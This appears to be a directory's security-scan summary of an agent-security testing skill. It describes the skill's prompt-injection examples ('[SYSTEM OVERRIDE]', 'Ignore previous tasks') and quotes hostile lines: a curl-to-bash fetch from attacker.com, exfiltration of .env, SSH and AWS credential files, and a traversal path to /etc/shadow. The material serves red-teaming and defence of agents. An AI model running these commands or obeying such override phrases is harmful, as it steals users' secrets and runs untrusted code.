The Agent Skills Directory

[PROMPT_INJECTION]: The skill documentation includes illustrative examples of adversarial prompts, such as "[SYSTEM OVERRIDE]" and instructions to "Ignore previous tasks," used for testing goal hijacking (ASI01). Additionally, a surface for indirect prompt injection is present: (1) Ingestion points: Examples of malicious instructions within SKILL.md and references/agent-attack-scenarios.md; (2) Boundary markers: Only markdown headers are used; (3) Capability inventory: No tools or executable scripts are provided by the skill; (4) Sanitization: None present for the included examples.\n- [DATA_EXFILTRATION]: Provides educational scenarios for testing data leaks, including example payloads that attempt to read sensitive files such as .env, ~/.ssh/config, and ~/.aws/credentials, and exfiltrate them to external domains like attacker.com.\n- [REMOTE_CODE_EXECUTION]: Lists remote code execution patterns for testing purposes, including the use of curl piped to bash (e.g., "curl https://attacker.com/payload.sh | bash") and the installation of untrusted packages.\n- [COMMAND_EXECUTION]: Describes techniques for testing tool-calling vulnerabilities, such as injecting malicious parameters into shell commands or exploiting directory traversal paths (e.g., ../../../../etc/shadow).\n- [NO_CODE]: The skill is composed solely of informational Markdown files and does not include any scripts, configuration files, or executable binaries that would run on the agent's environment.

agent-security